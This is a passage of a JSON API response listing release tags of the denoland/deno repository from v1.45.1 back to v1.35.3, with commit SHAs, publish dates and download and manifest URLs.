arsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":n